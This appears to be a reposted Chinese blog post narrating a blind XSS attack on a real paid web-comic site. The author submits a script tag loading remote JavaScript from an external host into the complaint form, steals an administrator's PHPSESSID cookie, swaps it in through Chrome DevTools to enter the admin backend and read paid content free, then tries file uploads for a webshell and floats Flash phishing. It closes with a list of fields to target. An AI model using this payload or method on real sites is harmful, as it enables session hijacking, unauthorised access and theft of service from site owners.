美文网首页
【网络安全】XSS盲打实战案例:某网页漫画

【网络安全】XSS盲打实战案例:某网页漫画

作者: H_00c8 | 来源:发表于2022-01-18 15:42 被阅读0次
image.png

什么是XSS盲打

简单来说,盲打就是在一切可能的地方尽可能多的提交XSS语句,然后看哪一条会被执行,就能获取管理员的Cooike。趁着没过期赶紧用了,这样就能直接管理员进后台。然后再上传一句话,Getshell。

盲打只是一种惯称的说法,就是不知道后台不知道有没有xss存在的情况下,不顾一切的输入XSS代码在留言啊,feedback啊之类的地方,尽可能多的尝试XSS的语句与语句的存在方式,就叫盲打。

"XSS盲打"是指在攻击者对数据提交后展现的后台未知的情况下,网站采用了攻击者插入了带真实攻击功能的XSS攻击代码(通常是使用script标签引入远程的js)的数据。当未知后台在展现时没有对这些提交的数据进行过滤,那么后台管理人员在操作时就会触发XSS来实现攻击者预定好的“真实攻击功能”。

通俗讲就是见到输入框就输入提前准备的XSS代码, 通常是使用script标签引入远程的js代码,当有后台人员审核提交数据时候,点击了提交的数据,触发获取到有价值信息 。

在这里插入图片描述

实战案例,一次XSS盲打

一次晚上,懒得开电脑就拿手机搜一个问题,于是就弹出了以下页面:


在这里插入图片描述

我试着看了会儿——正当看的我血脉喷张,想了解下面的剧情,点进去一看,居然要充值。不行,作为一名技术人员,对付这种网页白嫖才是王道


在这里插入图片描述
然后我便点开我的,然后点击投诉,进行XSS盲打操作
在这里插入图片描述

XSS Payload:

<sCRiPt sRC=https://xx.xx/dxxR></sCrIpT>
在这里插入图片描述

然后提交等待管理员或者运营人员看见,可能就会触发

中了,马飞

XSS后台成功看到了打中的消息,访问后台,替换Cookie进入后台

测试发现只需要PHPSESSID的值即可进入后台

在这里插入图片描述
Chrome如何不使用插件就替换Cookie值

F12,打开

然后看左边,选择Cookies,点击当前网址

然后右边就有字段和值

双击该字段或者值即可修改

没有的值,双击下面空白处即可新建

在这里插入图片描述
进入后台
在这里插入图片描述
白嫖看漫画,舒服了
后台尝试了文件上传,均被传到CDN和图片服务器,Flash钓鱼下次再干他
在这里插入图片描述

常见XSS盲打点:

1.各类APP的投诉以及建议的地方

2.留言评论处,反馈处等

3.充值需要提交给后台审核处

4.名字,真实姓名,银行信息,个人签名以及头像处等等

5.更多的大家留言补充吧

最后
此次经历只是想去搜个问题,无意看到的页面,请各位相信我,我不是那种人,我只是一名网络安全研究者。【安全学习】

相关文章

网友评论

      本文标题:【网络安全】XSS盲打实战案例:某网页漫画

      本文链接:https://www.haomeiwen.com/subject/dbvkhrtx.html